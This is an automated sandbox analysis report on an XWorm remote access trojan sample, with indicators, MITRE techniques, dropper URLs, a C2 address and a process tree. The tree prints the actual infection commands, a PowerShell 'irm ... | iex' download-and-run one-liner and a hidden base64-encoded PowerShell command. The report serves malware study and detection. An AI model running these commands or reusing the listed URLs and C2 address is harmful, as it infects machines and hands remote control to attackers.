xworm | 3014e597f348e41aa380aed3f84ce042a7f5f9113fbeb08c6b6e450555541527

Analysis

max time kernel
56s
max time network
59s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
24-01-2025 06:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.txt
Size

144B
MD5

af335e9be68e6153129d6c23d82557f0
SHA1

1ecbaeebd84c4783c2d644b95158c5ec4f285bf6
SHA256

3014e597f348e41aa380aed3f84ce042a7f5f9113fbeb08c6b6e450555541527
SHA512

f5268391fa1d4751e59901404cd26c4fdc3d982890b80addabd0194b3e5fc8dad747e7c93512bdc60f7274a9a4ee050617dcf9846f9ceb0108b16f9bb99e0336

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/Discord.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/GoogleChrome.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/explorer.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/svchost.exe

Extracted

Family

xworm

147.185.221.24:35724

Attributes

Install_directory
%ProgramData%
install_file
USB.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0028000000046357-279.dat	family_xworm
behavioral1/memory/4276-289-0x0000000000610000-0x0000000000626000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
29	1176	powershell.exe
31	1176	powershell.exe
54	2792	powershell.exe
56	2792	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1176	powershell.exe
2616	PowerShell.exe
3708	powershell.exe
864	powershell.exe
2792	powershell.exe
4264	powershell.exe
3304	powershell.exe
4736	powershell.exe
5060	powershell.exe
5112	powershell.exe
5112	powershell.exe
3668	powershell.exe
3540	powershell.exe
4736	powershell.exe
3304	powershell.exe
5060	powershell.exe
5448	powershell.exe
3996	powershell.exe
4264	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000\Control Panel\International\Geo\Nation	Discord.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk	Discord.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk	Discord.exe

Executes dropped EXE 1 IoCs

pid	Process
4276	Discord.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\ProgramData\\Discord"	Discord.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
30	raw.githubusercontent.com
31	raw.githubusercontent.com
56	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
67	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\39b540ba-437c-4974-8cf5-cd13d25f4120.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250124061213.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3720	schtasks.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
2616	PowerShell.exe
2616	PowerShell.exe
2616	PowerShell.exe
1176	powershell.exe
1176	powershell.exe
1176	powershell.exe
3708	powershell.exe
3708	powershell.exe
3708	powershell.exe
864	powershell.exe
864	powershell.exe
864	powershell.exe
1580	msedge.exe
1580	msedge.exe
2792	powershell.exe
2792	powershell.exe
3988	msedge.exe
3988	msedge.exe
2792	powershell.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
3304	powershell.exe
3304	powershell.exe
3304	powershell.exe
4736	powershell.exe
4736	powershell.exe
4736	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
5112	powershell.exe
5112	powershell.exe
5112	powershell.exe
640	identity_helper.exe
640	identity_helper.exe
3668	powershell.exe
3668	powershell.exe
3668	powershell.exe
5448	powershell.exe
5448	powershell.exe
5448	powershell.exe
3540	powershell.exe
3540	powershell.exe
3540	powershell.exe
3996	powershell.exe
3996	powershell.exe
3996	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2616	PowerShell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeIncreaseQuotaPrivilege	4264	powershell.exe
Token: SeSecurityPrivilege	4264	powershell.exe
Token: SeTakeOwnershipPrivilege	4264	powershell.exe
Token: SeLoadDriverPrivilege	4264	powershell.exe
Token: SeSystemProfilePrivilege	4264	powershell.exe
Token: SeSystemtimePrivilege	4264	powershell.exe
Token: SeProfSingleProcessPrivilege	4264	powershell.exe
Token: SeIncBasePriorityPrivilege	4264	powershell.exe
Token: SeCreatePagefilePrivilege	4264	powershell.exe
Token: SeBackupPrivilege	4264	powershell.exe
Token: SeRestorePrivilege	4264	powershell.exe
Token: SeShutdownPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeSystemEnvironmentPrivilege	4264	powershell.exe
Token: SeRemoteShutdownPrivilege	4264	powershell.exe
Token: SeUndockPrivilege	4264	powershell.exe
Token: SeManageVolumePrivilege	4264	powershell.exe
Token: 33	4264	powershell.exe
Token: 34	4264	powershell.exe
Token: 35	4264	powershell.exe
Token: 36	4264	powershell.exe
Token: SeDebugPrivilege	3304	powershell.exe
Token: SeIncreaseQuotaPrivilege	3304	powershell.exe
Token: SeSecurityPrivilege	3304	powershell.exe
Token: SeTakeOwnershipPrivilege	3304	powershell.exe
Token: SeLoadDriverPrivilege	3304	powershell.exe
Token: SeSystemProfilePrivilege	3304	powershell.exe
Token: SeSystemtimePrivilege	3304	powershell.exe
Token: SeProfSingleProcessPrivilege	3304	powershell.exe
Token: SeIncBasePriorityPrivilege	3304	powershell.exe
Token: SeCreatePagefilePrivilege	3304	powershell.exe
Token: SeBackupPrivilege	3304	powershell.exe
Token: SeRestorePrivilege	3304	powershell.exe
Token: SeShutdownPrivilege	3304	powershell.exe
Token: SeDebugPrivilege	3304	powershell.exe
Token: SeSystemEnvironmentPrivilege	3304	powershell.exe
Token: SeRemoteShutdownPrivilege	3304	powershell.exe
Token: SeUndockPrivilege	3304	powershell.exe
Token: SeManageVolumePrivilege	3304	powershell.exe
Token: 33	3304	powershell.exe
Token: 34	3304	powershell.exe
Token: 35	3304	powershell.exe
Token: 36	3304	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeIncreaseQuotaPrivilege	4736	powershell.exe
Token: SeSecurityPrivilege	4736	powershell.exe
Token: SeTakeOwnershipPrivilege	4736	powershell.exe
Token: SeLoadDriverPrivilege	4736	powershell.exe
Token: SeSystemProfilePrivilege	4736	powershell.exe
Token: SeSystemtimePrivilege	4736	powershell.exe
Token: SeProfSingleProcessPrivilege	4736	powershell.exe
Token: SeIncBasePriorityPrivilege	4736	powershell.exe
Token: SeCreatePagefilePrivilege	4736	powershell.exe
Token: SeBackupPrivilege	4736	powershell.exe
Token: SeRestorePrivilege	4736	powershell.exe
Token: SeShutdownPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeSystemEnvironmentPrivilege	4736	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3988	msedge.exe
3988	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2616 wrote to memory of 1176	2616	PowerShell.exe	99
PID 2616 wrote to memory of 1176	2616	PowerShell.exe	99
PID 1176 wrote to memory of 3988	1176	powershell.exe	102
PID 1176 wrote to memory of 3988	1176	powershell.exe	102
PID 1176 wrote to memory of 3708	1176	powershell.exe	103
PID 1176 wrote to memory of 3708	1176	powershell.exe	103
PID 3988 wrote to memory of 4960	3988	msedge.exe	104
PID 3988 wrote to memory of 4960	3988	msedge.exe	104
PID 3708 wrote to memory of 864	3708	powershell.exe	105
PID 3708 wrote to memory of 864	3708	powershell.exe	105
PID 864 wrote to memory of 2792	864	powershell.exe	106
PID 864 wrote to memory of 2792	864	powershell.exe	106
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1656	3988	msedge.exe	107
PID 3988 wrote to memory of 1580	3988	msedge.exe	108
PID 3988 wrote to memory of 1580	3988	msedge.exe	108
PID 3988 wrote to memory of 5436	3988	msedge.exe	109
PID 3988 wrote to memory of 5436	3988	msedge.exe	109
PID 3988 wrote to memory of 5436	3988	msedge.exe	109
PID 3988 wrote to memory of 5436	3988	msedge.exe	109
PID 3988 wrote to memory of 5436	3988	msedge.exe	109
PID 3988 wrote to memory of 5436	3988	msedge.exe	109
PID 3988 wrote to memory of 5436	3988	msedge.exe	109
PID 3988 wrote to memory of 5436	3988	msedge.exe	109
PID 3988 wrote to memory of 5436	3988	msedge.exe	109
PID 3988 wrote to memory of 5436	3988	msedge.exe	109

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"
1⤵
PID:4840

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -Command "Start-Process PowerShell -ArgumentList 'irm "https://tinyurl.com/4j72ashp/" | iex' -Verb RunAs"
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm https://tinyurl.com/4j72ashp/ | iex
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://as2.ftcdn.net/v2/jpg/00/53/69/65/1000_F_53696591_9LO1bsQUpl2zIolFMFokrQyt04Z5dzXd.jpg
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff9da6746f8,0x7ff9da674708,0x7ff9da674718
      4⤵
      PID:4960
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2
      4⤵
      PID:1656
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
      4⤵
      PID:5436
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
      4⤵
      PID:4852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
      4⤵
      PID:2596
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8
      4⤵
      PID:5288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:5452
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff70aed5460,0x7ff70aed5470,0x7ff70aed5480
        5⤵
        
        PID:3372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:640
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
      4⤵
      PID:1852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
      4⤵
      PID:4236
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
      4⤵
      PID:5596
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9669778617380053652,5042101448364582668,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
      4⤵
      PID:4520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAGMAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEASABNAEEAYQBBAEIAbABBAEcAdwBBAGIAQQBBAGcAQQBDADAAQQBUAGcAQgB2AEEARgBBAEEAYwBnAEIAdgBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAbABBAEcATQBBAGQAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgBBAEEAYgB3AEIAcwBBAEcAawBBAFkAdwBCADUAQQBDAEEAQQBRAGcAQgA1AEEASABBAEEAWQBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBGAGMAQQBhAFEAQgB1AEEARwBRAEEAYgB3AEIAMwBBAEYATQBBAGQAQQBCADUAQQBHAHcAQQBaAFEAQQBnAEEARQBnAEEAYQBRAEIAawBBAEcAUQBBAFoAUQBCAHUAQQBDAEEAQQBMAFEAQgBGAEEARwA0AEEAWQB3AEIAdgBBAEcAUQBBAFoAUQBCAGsAQQBFAE0AQQBiAHcAQgB0AEEARwAwAEEAWQBRAEIAdQBBAEcAUQBBAEkAQQBBAGkAQQBHAE0AQQBRAFEAQgBDAEEASABZAEEAUQBRAEIASQBBAEcATQBBAFEAUQBCAGEAQQBGAEUAQQBRAGcAQgA1AEEARQBFAEEAUwBBAEIATgBBAEUARQBBAFkAUQBCAEIAQQBFAEkAQQBiAEEAQgBCAEEARQBjAEEAZAB3AEIAQgBBAEcASQBBAFEAUQBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARABBAEEAUQBRAEIAVwBBAEgAYwBBAFEAZwBCAHcAQQBFAEUAQQBSAHcAQQAwAEEARQBFAEEAVwBnAEIAQgBBAEUASQBBAGQAZwBCAEIAQQBFAGcAQQBZAHcAQgBCAEEARgBVAEEAZAB3AEIAQwBBAEQAQQBBAFEAUQBCAEkAQQBHAHMAQQBRAFEAQgBpAEEARQBFAEEAUQBnAEIAcwBBAEUARQBBAFEAdwBCAEIAQQBFAEUAQQBVAHcAQgBCAEEARQBJAEEAYwBBAEIAQgBBAEUAYwBBAFUAUQBCAEIAQQBGAG8AQQBRAFEAQgBDAEEARwB3AEEAUQBRAEIASABBAEQAUQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBRAEIATgBBAEUARQBBAFkAZwBCADMAQQBFAEkAQQBkAEEAQgBCAEEARQBjAEEATQBBAEIAQgBBAEYAawBBAFUAUQBCAEMAQQBIAFUAQQBRAFEAQgBIAEEARgBFAEEAUQBRAEIASgBBAEUARQBBAFEAUQBCAHAAQQBFAEUAQQBSAFEAQgBGAEEARQBFAEEAVwBnAEIAQgBBAEUASQBBAGEAdwBCAEIAQQBFAE0AQQBNAEEAQgBCAEEARgBRAEEAVQBRAEIAQwBBAEgAYwBBAFEAUQBCAEcAQQBFAEUAQQBRAFEAQgBqAEEARwBjAEEAUQBnAEIAcwBBAEUARQBBAFIAdwBCAFoAQQBFAEUAQQBXAGcAQgBSAEEARQBJAEEAZQBRAEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBHAEkAQQBaAHcAQgBDAEEARwBvAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBRAEIAVgBBAEUARQBBAFoAUQBCAEIAQQBFAEkAQQBhAGcAQgBCAEEARQBjAEEAZAB3AEIAQgBBAEcAUQBBAFUAUQBCAEMAQQBIAG8AQQBRAFEAQgBIAEEARwBzAEEAUQBRAEIAaQBBAEgAYwBBAFEAZwBCADEAQQBFAEUAQQBSAGcAQgBCAEEARQBFAEEAVwBRAEIAUgBBAEUASQBBAE0AQQBCAEIAQQBFAGMAQQBaAHcAQgBCAEEARQBrAEEAUQBRAEIAQgBBAEcANABBAFEAUQBCAEYAQQBFADAAQQBRAFEAQgBQAEEARwBjAEEAUQBnAEIAagBBAEUARQBBAFIAZwBCAEIAQQBFAEUAQQBZAHcAQgBuAEEARQBJAEEAZABnAEIAQgBBAEUAYwBBAFkAdwBCAEIAQQBHAE0AQQBaAHcAQgBDAEEARwBnAEEAUQBRAEIASABBAEQAQQBBAFEAUQBCAFMAQQBFAEUAQQBRAGcAQgBvAEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFcAUQBCAFIAQQBFAEUAQQBiAGcAQgBCAEEARQBNAEEAUwBRAEIAQgBBAEUATQBBAFoAdwBCAEMAQQBIAGMAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAawBBAEgAYwBBAFEAZwBCAHMAQQBFAEUAQQBTAEEAQgBKAEEARQBFAEEAWQB3AEIAMwBBAEUASQBBAGIAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARwBJAEEAUQBRAEIAQwBBAEgATQBBAFEAUQBCAEQAQQBFAEUAQQBRAFEAQgBNAEEARgBFAEEAUQBnAEIAWQBBAEUARQBBAFIAdwBCAHIAQQBFAEUAQQBZAGcAQgBuAEEARQBJAEEAYQB3AEIAQgBBAEUAYwBBAE8AQQBCAEIAQQBHAFEAQQBkAHcAQgBDAEEARgBRAEEAUQBRAEIASQBBAEYARQBBAFEAUQBCAGwAQQBGAEUAQQBRAGcAQgB6AEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFMAUQBCAEIAQQBFAEkAQQBTAFEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEYAbwBBAFEAUQBCAEMAQQBHAHMAQQBRAFEAQgBIAEEARgBVAEEAUQBRAEIAaQBBAEcAYwBBAFEAUQBCAG4AQQBFAEUAQQBRAHcAQQB3AEEARQBFAEEAVQBRAEIAMwBBAEUASQBBAGQAZwBCAEIAQQBFAGMAQQBNAEEAQgBCAEEARwBJAEEAVQBRAEIAQwBBAEcAZwBBAFEAUQBCAEgAQQBEAFEAQQBRAFEAQgBhAEEARQBFAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAEoAQQBFAEUAQQBVAFEAQgBSAEEARQBJAEEAYQB3AEIAQgBBAEUAYwBBAFUAUQBCAEIAQQBFAHcAQQBVAFEAQgBDAEEARQA0AEEAUQBRAEIASQBBAEUARQBBAFEAUQBCAFYAQQBFAEUAQQBRAGcAQgA1AEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFcAZwBCAG4AQQBFAEkAQQBiAEEAQgBCAEEARQBnAEEAUwBRAEIAQgBBAEYAbwBBAFUAUQBCAEMAQQBIAFUAQQBRAFEAQgBIAEEARQAwAEEAUQBRAEIAYQBBAEYARQBBAFEAUQBCAG4AQQBFAEUAQQBRAHcAQQB3AEEARQBFAEEAVQBnAEIAUgBBAEUASQBBAE4AQQBCAEIAQQBFAGMAQQBUAFEAQgBCAEEARwBJAEEAUQBRAEIAQwBBAE